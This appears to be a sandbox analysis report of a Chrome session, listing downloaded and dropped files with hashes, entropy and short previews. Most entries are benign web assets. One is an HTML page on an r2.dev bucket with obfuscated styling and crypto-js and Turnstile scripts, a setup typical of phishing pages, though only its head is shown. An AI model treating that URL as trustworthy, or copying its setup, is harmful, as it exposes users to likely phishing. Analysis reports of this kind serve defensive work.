                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):79017
                                                                                                                                                                                                        Entropy (8bit):5.610379123141455
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:SIqih/oDhcgNgXVqy/OyVqyDOog2asMQi2aTXwPKMYSBRguJOvtyCNRqQfMSrJbd:sX2BA1yufMSrJbVv4E
                                                                                                                                                                                                        MD5:F77E02A6EB98995B462E64F40B04E0D9
                                                                                                                                                                                                        SHA1:9E5DE903E0B3F7E53AB83D351E24C138F18BE48F
                                                                                                                                                                                                        SHA-256:55D0C35CBBD3071C89A84752E0B8F9FAF6AE914BC680E2BE8B047FDB7E5D641A
                                                                                                                                                                                                        SHA-512:302B93F7472161EB2A20EAEF7A3AED9F395026DB6DBC5EA5774D53A45CD5A17A6BE4AC2E0BD5A51AE9606C02A7473328E2F98A4F10EEF881326633D9A204D595
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://reviews.capterra.com/_next/static/css/50b7e331868b2bdc.css
                                                                                                                                                                                                        Preview::root{font-size:16px;line-height:24px}*,:after,:before{box-sizing:border-box;border:0 solid transparent;outline-color:#1c6fd1}:focus-visible{outline-width:2px;outline-style:solid;outline-color:#1c6fd1;outline-offset:2px}:focus-visible.color-mode-dark{outline-color:#68c5ed}.hidden{display:none}.invisible{visibility:hidden}html{overflow-x:hidden;color:#363a41;-webkit-letter-spacing:.025em;-moz-letter-spacing:.025em;-ms-letter-spacing:.025em;letter-spacing:.025em;--global-bg-light:#fff;--global-bg-medium:#f2f8fb;--global-bg-dark:#002e47}.sb{position:relative}.sb.bkg-white{background:#fff!important;color:#000!important}.sb.bkg-white::-moz-placeholder{color:#000}.sb.bkg-white::placeholder{color:#000}.sb.txt-white{color:#fff}.sb.bkg-black{background:#000!important;color:#fff!important}.sb.bkg-black::-moz-placeholder{color:#fff}.sb.bkg-black::placeholder{color:#fff}.sb.txt-black{color:#000}.sb.bkg-primary-base{background:#1c6fd1!important;color:#fff!important}.sb.bkg-primary-base::-moz-placeh
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (20314), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):20314
                                                                                                                                                                                                        Entropy (8bit):5.38896819223286
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:bOKLVJpmfv85lMO8ZVS3X8gkaVkF5BUMtWHTukwR/RdUWJdt:CKhGv87MO8nm8gkakFAoWHTukwRhJb
                                                                                                                                                                                                        MD5:8AF9AA3BFA8ED7BBAA4189CCA768B6EF
                                                                                                                                                                                                        SHA1:533564913B9F573E6CE546D8B00FEA30516B8752
                                                                                                                                                                                                        SHA-256:A461AC8D233A549A00475DC12E27744EC778D62F48E021586E549713652CB30C
                                                                                                                                                                                                        SHA-512:668D0940A68C653E663AE6166BD71E0BF07E063AFB138E82EBE8A3FF79AD58A15D1C60FDB175B62FDF7B6397213B64FB38BFFBE13541306F043262D6E6391792
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9942],{16742:function(e){var t;t=function(){"use strict";let{entries:e,setPrototypeOf:t,isFrozen:n,getPrototypeOf:o,getOwnPropertyDescriptor:r}=Object,{freeze:i,seal:a,create:l}=Object,{apply:c,construct:s}="undefined"!=typeof Reflect&&Reflect;c||(c=function(e,t,n){return e.apply(t,n)}),i||(i=function(e){return e}),a||(a=function(e){return e}),s||(s=function(e,t){return new e(...t)});let u=A(Array.prototype.forEach),m=A(Array.prototype.pop),f=A(Array.prototype.push),p=A(String.prototype.toLowerCase),d=A(String.prototype.toString),h=A(String.prototype.match),g=A(String.prototype.replace),y=A(String.prototype.indexOf),T=A(String.prototype.trim),E=A(RegExp.prototype.test),b=(j=TypeError,function(){for(var e=arguments.length,t=Array(e),n=0;n<e;n++)t[n]=arguments[n];return s(j,t)});function A(e){return function(t){for(var n=arguments.length,o=Array(n>1?n-1:0),r=1;r<n;r++)o[r-1]=arguments[r];return c(e,t,o)}}function _(e,o,r){var i;r=n
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (36971), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):36971
                                                                                                                                                                                                        Entropy (8bit):5.351301646577381
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:sk2RSeHzFkFmnCrScQYcV6M6KpEHPAWuKuo:s9RSeHzuFECrScQYcV6M6KqHPAWuKF
                                                                                                                                                                                                        MD5:3140E272EE16AAB38C754A5045241AB2
                                                                                                                                                                                                        SHA1:D1F20D42C7F5F2100B3F0E675AB7EF7F13E4B684
                                                                                                                                                                                                        SHA-256:7AE98BF01803E672AA4F55AF9B060C99504335388AC5EA1C1574283CA86ABFDD
                                                                                                                                                                                                        SHA-512:8FD2A16F330694E671FDF28556D9253BE0CF3B90A2BCF73E7C27E0EECBA16390A88181B6E11201356D0C6A8BE18B87382F8D0770745851A69D8B4C3902121651
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2322],{10857:function(e,t,n){"use strict";n.d(t,{default:function(){return h}});var a=n(27573),i=n(38458),r=n(57908),o=n(34617),l=n(33588),s=n(81731),c=n(32012),d=n(79289),u=n(20857),m=n(48832),g=n(78713),v=n(95218);let p=()=>({name:"engagement_hover",engagement_component:"product_main-card",engagement_destination:"show_rating-breakdown",engagement_details:"hover_overall-rating"}),f=function(){let e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:0;return{name:"engagement_product_click",engagement_component:"product_main-card",engagement_destination:e>=g.Qq?"go-to_reviews":"go-to_product-details_anchor-reviews",engagement_details:"text-link_review-count"}};var h=e=>{var t,n,h,_,w,x,b;let{product:j,facet:k}=e,{scrollY:y}=(0,m.Z)(),{deviceType:N}=(0,u.hU)();if(!j)return null;let{reviewSummary:P}=j,C=null!==(n=null==P?void 0:P.rating)&&void 0!==n?n:0,R=(null==j?void 0:null===(t=j.category)||void 0===t?void 0:t.htmlName)||"",Z
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):1072
                                                                                                                                                                                                        Entropy (8bit):6.813625689271423
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:+zxYjOFnNzBaj1OijDm52zG6VunyI2ltqx:+zxYjOFnNsjYGA2LuafY
                                                                                                                                                                                                        MD5:0AA64A6037412457937000EF4FB9FC33
                                                                                                                                                                                                        SHA1:4DF3FA78DDCDDC93414F24CC7D44086B7A3936F9
                                                                                                                                                                                                        SHA-256:2ECAA4F8A4FDB5D3DE9E21AF415A1412D9C4BBA850651CDADAD81E1981F6D666
                                                                                                                                                                                                        SHA-512:1ED0AC849471201632ED85C177E9B835E989B940F798BFEE8572F8217C52E9BB35F407E7452042039DBBEE847BC17270352EF492F17CFCC81537D866CC0DCFE2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/af2cdc9a-967d-4921-a711-ec9e1a75cf88.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D..................................Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe....... ... ....pixi............av1C........colrnclx...........pixi..........av1C.......8auxC....urn:mpeg:mpegB:cicp:systems:auxiliary:alpha.....ipma..........................mdat......?..2.....1@. .>4F2J...k.'%..m.#QR.)>...._....0[k1q:]O.;...3B.....F.....T./...r.....%Yf..v...U.y.cJ/0.....C..b.RDo...C..F.N.Ot....v+...T....<YC.GGt.2...N.^....%...T..g.xvaF....X..c......Y5.....f.....{..n`.TnXj.k..].}7...E...\H......?...h4 2......0...G4......7...#.A..4.....p.K'..X2c..y..cp^bJ.....$....... =&...(.TN...gL/....UG..[O.+Z.#t.a .Z...f..~...0n...]*t..TV..L.e....Py..gAQT..C...G..c%....w..IoJ_G......g..BP.....l06.....J)..=$...$.<..$<.8.-).x.L.\......&.d.f..hc\.T..-.)..' 8[2.R....6...-...\.*k{W.B$....g.glEM.....H..!
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (9010), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):9010
                                                                                                                                                                                                        Entropy (8bit):5.371041651908105
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:kEhqeW5Yf52s1NFbXJPJtygqoXgHMze0/R:HU5Yf52QCeXZ
                                                                                                                                                                                                        MD5:C7645BF57FB6AEBDD44E1C85C163129F
                                                                                                                                                                                                        SHA1:1B9C0087A12D9BFC206E73154727C3225DA9EF29
                                                                                                                                                                                                        SHA-256:5D462F95ADB0CA30CAFD288B4C5B80C32CC02C6C6228BE8E921B6B251421D566
                                                                                                                                                                                                        SHA-512:DED182D21ACE14DA191B9A4E6F58AD1C01445C0B068DD3E5FDB9562FEB82F474A5AA4C58106BF08B1299AEEE4B1B014DFFD6E7CB2C16A5B7CF3AD25EA4F0BA41
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[511],{76125:function(e,t,n){var s=n(27573),a=n(17033),l=n(40763),r=n(69379),i=n(78713),o=n(43930);let d=e=>{let{children:t}=e;return(0,s.jsx)("p",{className:"text-neutral-99 text-lg font-semibold md:text-xl",children:t})};t.default=e=>{var t,n,u,c;let{pros:v,cons:x,showReviewButtons:m}=e,p=(0,l.useSharedData)(),f=null!==(n=null==p?void 0:null===(t=p.reviewSummary)||void 0===t?void 0:t.totalReviews)&&void 0!==n?n:0,h=null!==(u=null==p?void 0:p.reviewUrl)&&void 0!==u?u:"",g=(0,i.f_)({product:{id:null!==(c=null==p?void 0:p.productId)&&void 0!==c?c:"",reviewSummary:null==p?void 0:p.reviewSummary,slug:null==p?void 0:p.slug,publishedPages:null==p?void 0:p.publishedPages},facet:"reviews"}),j=v.length>x.length?x.length:v.length;return(0,s.jsxs)("div",{"data-testid":"desktop-pros-and-cons",className:"px-2xs my-2xl border-t-1 border-b-1 border-primary-50 gap-xl flex",children:[(0,s.jsxs)("div",{className:"py-xl flex basis-1/2
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (17065), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):17065
                                                                                                                                                                                                        Entropy (8bit):5.1089101567430735
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:FtDuCrl6xOIVoCM6qbSjbCMTYozln0/s4MXcK/qtQCZ69CmC4yVs:FtDuCrl6x1OCM1SjbCMTYoz10/s4mcKF
                                                                                                                                                                                                        MD5:E28EBC3391B56E8F01EA063DC089E9D3
                                                                                                                                                                                                        SHA1:D0EB0EDDB70199DB3533F492E7F2E22BE890A1FA
                                                                                                                                                                                                        SHA-256:AFBD41E7209FA3AEF6F53C7A5713AA542A7BE54C432FEC2D690E0DFACCD528D1
                                                                                                                                                                                                        SHA-512:A2ED47575F06F20F3C53845F527E5CEF910A85AAB2CC8F07EFD761239C2255920A154CDF432E170207BE23841458D22BFA96C47CD4ECA590BC71A948B8F98F46
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://js.driftt.com/core/assets/js/19.6f85b843.chunk.js
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[19],{"1J7a":function(t,e){t.exports=function _arrayWithHoles(t){if(Array.isArray(t))return t}},"2jbg":function(t,e,r){"use strict";function _setPrototypeOf(t,e){return(_setPrototypeOf=Object.setPrototypeOf||function _setPrototypeOf(t,e){return t.__proto__=e,t})(t,e)}r.d(e,"a",function(){return _setPrototypeOf})},"4+fu":function(t,e,r){"use strict";function _assertThisInitialized(t){if(void 0===t)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return t}r.d(e,"a",function(){return _assertThisInitialized})},"5aO3":function(t,e,r){"use strict";function _arrayLikeToArray(t,e){(null==e||e>t.length)&&(e=t.length);for(var r=0,n=new Array(e);r<e;r++)n[r]=t[r];return n}r.d(e,"a",function(){return _arrayLikeToArray})},"7Ru6":function(t,e){t.exports=function _nonIterableRest(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [S
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):79
                                                                                                                                                                                                        Entropy (8bit):3.9951663126378123
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:U3KTDW3MiLLUHcjVXlVBT7J:H6NLgHWXZT7J
                                                                                                                                                                                                        MD5:97B958FA75E225CEA6FA3F3E399010D0
                                                                                                                                                                                                        SHA1:4DDFF887AB1D6FFC1678A717F1327E6C0900B9F8
                                                                                                                                                                                                        SHA-256:0C909725B0EA7DA9994F16E47A4142783410C5AA25CDD7770F85DC61EB8A170C
                                                                                                                                                                                                        SHA-512:C8130E21AF2E53D9B3615EAF54714A1160C0D2D80629F4EC19108F307226FA62ED9A45D415041C649A9E2BC2631AF87DD0FC88792051B82096904D3A44166882
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://bam-cell.nr-data.net/1/a3d3f0e0e6?a=7895846&sa=1&v=1215.1253ab8&t=Unnamed%20Transaction&rst=15404&ck=1&ref=https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1&be=3120&fe=14688&dc=7338&af=err,xhr,stn,ins,spa&perf=%7B%22timing%22:%7B%22of%22:1725034532666,%22n%22:0,%22f%22:3,%22dn%22:448,%22dne%22:448,%22c%22:448,%22s%22:449,%22ce%22:1211,%22rq%22:1211,%22rp%22:2667,%22rpe%22:2668,%22dl%22:2674,%22di%22:5839,%22ds%22:7337,%22de%22:7338,%22dc%22:14686,%22l%22:14687,%22le%22:14691%7D,%22navigation%22:%7B%7D%7D&fp=7402&fcp=7877&jsonp=NREUM.setToken"
                                                                                                                                                                                                        Preview:NREUM.setToken({'stn':0,'err':1,'ins':1,'spa':1,'sr':0,'srs':0,'st':1,'sts':0})
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (17558)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):18318
                                                                                                                                                                                                        Entropy (8bit):5.526328799423595
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:sBpuqH/hjrTh73Cq/NsAihkU/Tdosoai4uoWXjXBUKRKji:sB3fZx3O1hkU/TjoaNuoWXT5Rx
                                                                                                                                                                                                        MD5:5622E358424CB080FEF281AA7045BA59
                                                                                                                                                                                                        SHA1:DEB0FFAE022297D8100E166A1FC19D0FA8B3D602
                                                                                                                                                                                                        SHA-256:E16F797F2A141D51C522F403E0B4848EC6497221902F28AA44DF4F59EC688E85
                                                                                                                                                                                                        SHA-512:1051B0961B68168F998D225D57E5D877866632173FB5642A2458A0BA75DA79BBCB93EE5972B6A68EF7F90DBE7DEF4BB922136F41ED53F07B9A98416B2F41DCC4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://device.maxmind.com/js/device.js
                                                                                                                                                                                                        Preview:(()=>{var u=(e,t,n)=>new Promise((o,r)=>{var c=a=>{try{l(n.next(a))}catch(i){r(i)}},s=a=>{try{l(n.throw(a))}catch(i){r(i)}},l=a=>a.done?o(a.value):Promise.resolve(a.value).then(c,s);l((n=n.apply(e,t)).next())});window.__mmapiws=window.__mmapiws||{};var p=window.__mmapiws;function g(e,t){let n=e.length&3,o=e.length-n,r=t,c,s=3432918353,l=461845907,a=0,i;for(;a<o;)i=e.charCodeAt(a)&255|(e.charCodeAt(++a)&255)<<8|(e.charCodeAt(++a)&255)<<16|(e.charCodeAt(++a)&255)<<24,++a,i=(i&65535)*s+(((i>>>16)*s&65535)<<16)&4294967295,i=i<<15|i>>>17,i=(i&65535)*l+(((i>>>16)*l&65535)<<16)&4294967295,r^=i,r=r<<13|r>>>19,c=(r&65535)*5+(((r>>>16)*5&65535)<<16)&4294967295,r=(c&65535)+27492+(((c>>>16)+58964&65535)<<16);switch(i=0,n){case 3:i^=(e.charCodeAt(a+2)&255)<<16;case 2:i^=(e.charCodeAt(a+1)&255)<<8;case 1:i^=e.charCodeAt(a)&255,i=(i&65535)*s+(((i>>>16)*s&65535)<<16)&4294967295,i=i<<15|i>>>17,i=(i&65535)*l+(((i>>>16)*l&65535)<<16)&4294967295,r^=i}return r^=e.length,r^=r>>>16,r=(r&65535)*2246822507+(((
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (31385), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):31385
                                                                                                                                                                                                        Entropy (8bit):5.298161108135626
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:46IrtGY4trjTtMoboL6bcLIiJGDPB8Sc7b:DIrEYuXSoboOcLXcs3
                                                                                                                                                                                                        MD5:C9861C1AC17232AECA7AB6802D7A8E19
                                                                                                                                                                                                        SHA1:6E764706BC5868FF3F536C7501DCF2F6E04E67E7
                                                                                                                                                                                                        SHA-256:E81237DD0B5C2660519182F90191B45FD50C245005A9F1DCEAE9B05BA01809BA
                                                                                                                                                                                                        SHA-512:14F2FC95E18F5FE7D7A3C882DECE3510C2A87EEF406B25AB54EDD4BFE2904D8ADF9D671CAEF7271A0F3FB2B0394A6EEF6941B4E5BAA4870CB198E8DF94524DAE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:!function(){"use strict";function c(n){var e=U();return e[n]=e[n]||{id:n,plugins:{},getPlugins:function(){var n,e=[];for(n in this.plugins)e.push(this.plugins[n]);return e},autoTrackingInitialized:!1},e[n]}function P(n,e){n=c(n);return n.plugins[e]=n.plugins[e]||{},n.plugins[e]}function U(){var n=y();return n.r=n.r||{},n.r}d()&&(window.ldfdr.registerTracker=function(n,e,t,r,i,o,a){return(n=c(n)).track=e,n.identify=t,n.pageview=r,n.getClientId=i,n.acceptCookie=o,n.rejectCookie=a,n},window.ldfdr.setTrackerOption=function(n,e,t,r){c(n)[e]=void 0!==r?r:t},window.ldfdr.registerPlugin=function(n,e,t){var r=c(n),i=P(n,e);i.init=function(){try{t()}catch(n){console.error("Error during plugin initialization",i,n)}},r.pluginsInitialized&&i.init()},window.ldfdr.registerPluginConfig=function(n,e,t,r){P(n,e).config=void 0!==r?r:t});var n,e,j,k="bElvO73dOjE4ZMqj",J="2.64.0",G="_lfa_debug_settings",F=["cookieDomain","enableAutoTracking","trackingCookieDurationDays"];if("undefined"!=typeof window&&void
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (11172), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):11180
                                                                                                                                                                                                        Entropy (8bit):5.37118068503325
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:+QQIN28utVYgNW/Bd03Fq1N4We/NxOTu0GNhneRxr/4wIHWncZ:+QTBezW83Fq1OWe/NUTufnuxr+z
                                                                                                                                                                                                        MD5:D08C382407F0FE13EA956861865894A8
                                                                                                                                                                                                        SHA1:3BAC5E65A7D9F7344C068EDF1A566A4FEC7ACCFA
                                                                                                                                                                                                        SHA-256:C7E241D09233B3EF6BE9B121831BF8C62CA610377F981EED7FF7DA4008A248E4
                                                                                                                                                                                                        SHA-512:48CBEC3FEA203D099D3351649A0AAFA74B9B116EF3F45BBE8D502481490BF297231C6602C13A6C697D5D8197727F5AB406C57C2E62B81B4E925B126A6DB2D28C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/chunks/1304-8efe5fce7387b267.js
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1304],{84362:function(e,t,n){n.d(t,{h:function(){return r.hU},v:function(){return r.vl}});var r=n(20857)},33588:function(e,t,n){n.r(t),n.d(t,{Breadcrumbs:function(){return r.Oo},Drawer:function(){return r.dy},MediaGallery:function(){return r.ew},Pagination:function(){return r.tl},StarRating:function(){return r.ZF}});var r=n(62780)},34617:function(e,t,n){n.r(t),n.d(t,{Accordion:function(){return a.UQ},Alert:function(){return a.bZ},Avatar:function(){return a.qE},Badge:function(){return a.Ct},Button:function(){return a.zx},Card:function(){return a.Zb},ColorMode:function(){return a.UX},Dropdown:function(){return a.Lt},Element:function(){return a.W_},EventContext:function(){return i.Af},Form:function(){return a.l0},Icon:function(){return a.JO},Link:function(){return a.rU},List:function(){return a.aV},ListItem:function(){return o},Modal:function(){return a.u_},ProgressBar:function(){return a.ko},Rule:function(){return a.$9
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (33094), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):33094
                                                                                                                                                                                                        Entropy (8bit):5.271194779008479
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:+MT7wsVvhAfNL2hzOtDENEhe2xZc9KhvpcFvRrfVBejwX:+M/wsVvhAfNL2CEQbc9KVpcFvFVB6y
                                                                                                                                                                                                        MD5:D8739A9FE9A3A42936F5CD86C8727494
                                                                                                                                                                                                        SHA1:4FB60EC9F1C4EFF985C219BF24E4B1F340D62C97
                                                                                                                                                                                                        SHA-256:8F0F8792237470EE661C6AFC32CA68200DD74BCC0D544D0FD54C7777AF362EAE
                                                                                                                                                                                                        SHA-512:3326F37AE1DB03E06E8A1EC7E0B39D4F055C55E0B2DE6386F0677250A48B0146A081B3E17B42E01C194F0CD3FA5B63871FAE86478891644EA41BA1747A647EE5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[22],{"+OSO":function(t,n,e){"use strict";e.d(n,"a",function(){return createClientReportEnvelope});var r=e("8dVd"),i=e("xqFT");function createClientReportEnvelope(t,n,e){var o=[{type:"client_report"},{timestamp:e||Object(i.a)(),discarded_events:t}];return Object(r.c)(n?{dsn:n}:{},[o])}},"/brt":function(t,n,e){"use strict";e.d(n,"a",function(){return severityLevelFromString});var r=["fatal","error","warning","log","info","debug"];function severityLevelFromString(t){return"warn"===t?"warning":r.includes(t)?t:"log"}},"26VM":function(t,n,e){"use strict";e.d(n,"a",function(){return isDOMError}),e.d(n,"b",function(){return isDOMException}),e.d(n,"c",function(){return isElement}),e.d(n,"d",function(){return isError}),e.d(n,"e",function(){return isErrorEvent}),e.d(n,"f",function(){return isEvent}),e.d(n,"g",function(){return isInstanceOf}),e.d(n,"h",function(){return isNaN}),e.d(n,"i",function(){return isPlainObject}),e.d(n,"j",function(){ret
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2860), with CRLF line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5989
                                                                                                                                                                                                        Entropy (8bit):5.736768029643108
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:1hXjTnjk6gMnnsJuWqq0Rj3ImydlaLHVrjtZjw0:fzjjt5RWqq0Rj8qHVfjw0
                                                                                                                                                                                                        MD5:B2DFD747819FB3488EEBDF2E46BEFCCD
                                                                                                                                                                                                        SHA1:D1A0CC63EE60915744D4CFAAD335AB6EE4DBFF27
                                                                                                                                                                                                        SHA-256:871A824960486EA1C5121B7256B0E9234F21EDC5966F95A8B95F268C43D1DE70
                                                                                                                                                                                                        SHA-512:03F6D11B887186D246E5E5D3EA0B063382795BBAC8F34502603737E4D5F285B969BCCFD5A1A695E0309BD8EE49A4029FF7C01002081008AE0B32088551887F75
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874876473768.html
                                                                                                                                                                                                        Preview:<html>.. <head>.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noindex, nofollow">.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script>.. <script src="https://challenges.cloudflare.com/turnstile/v0/api.js"></script>.. <style>body, html {height: 100%;margin: 0;display: flex;align-items: center;justify-content: center;}@keyframes bounce {0%, 100%, 12.5%, 32.5%, 76.1% {transform: translateY(0);}22.5%, 86% {transform: translateY(7px);}}#iambus {height: 179px;width: 130px;overflow: hidden;margin-top: -59px;margin-left: 25px;}@keyframes shadow-fade {0%, 100%, 21.2%, 80% {opacity: 0;}47%, 70% {opacity: 1;}}#vacillation {width: 130px;margin-top: 179px;}#naphtha {width: 130px;height: 71px;border-radius: 0 0 7px 7px;overflow: hidden;margin-top: -41px;}#naphtha>.wadi {width: 287px;height: 71px;background: #27a0e0;transform: translate(-153px, -70px) rotate(28deg);}#naphtha>.jacaranda {width:
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 39656, version 1.0
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):39656
                                                                                                                                                                                                        Entropy (8bit):7.994020642577385
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:768:2G0Xwvu3MxEAUgSPIV8jl269f56ht2qRqmPLJjsx1zhXV9Mw9d:/0eu3Mx3qWIlD9fg0UsvzhXV9M+
                                                                                                                                                                                                        MD5:96119424E5C330593C8121DD6DAC1BCE
                                                                                                                                                                                                        SHA1:B326DE4565A5A03B73D9034776745F35F54FD0C6
                                                                                                                                                                                                        SHA-256:5042714B45298A9022F0F1E03CEE6B117BD00104760945D9BFEF6F7B9C6A86D4
                                                                                                                                                                                                        SHA-512:3BB4568AF34B501C5400B4F91C105778EBAACAD759680F7C113B85F5B931489EBC6D6C3063FF28980C9FC7370F81E999F9532FFBBF8716686D9AB059CF315150
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/dmsans/v15/rP2Wp2ywxg089UriCZaSExd86J3t9jz86MvyyKy58Q.woff2
                                                                                                                                                                                                        Preview:wOF2............../....s..............................:..J?HVAR.I.`?STAT.X'2.../l.....|.6....0..*.6.$.... ..,..D..[Q.Q.i...1}.>!*....)amM....58..L@....y...W.j...>.(..<.(.p......l..`.eecA.}..-76.a.M8.#E..<5..Iy...G.......H..p.....QJ............e...jP1..B. '.o>.r........._.7U.r6...?.j...wQ..C..E....c.A.6..D....#.......A.....~.....`.Qc.9`.B$..sG.p.#.....F..r.q...).r..aq..,.(Nq6.6..C4]M.z.6.4.7"..J|7.MS.*@.k..G..S.(g.....S..T..d..d........?\......5.M......{.O..&...Ti.Q...:..G........{....O.2<8...wf.I.4.>...3.TtZ...u..o..,.......!!...1...........8...b5.m.t..w..........M..A.Z.$.,.p...(.U...J..uDO.. %2C.-.5...9M.........O.P.... .7....o..}@.|.M....,K..4Y...>....W.....w...7.O..T.U.i,a..[.'hx.P...S...q......W..5.5.DxQ...%...p.O.....m3.!.R.....J.....fP...P'E....(ID...B...z./ikI`'a..L........."..iO=.3.o.6k..EZ*.T...".o....%.J..CI|.3..yN..<....(...5....6..~..J.<)O...Hg.UEX.{................".C0"....<.t.....24.N.B%]...^ie...(..\eF...L.....Zg.u...A8=}..R.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):6239
                                                                                                                                                                                                        Entropy (8bit):7.452066390875264
                                                                                                                                                                                                        Encrypted:false
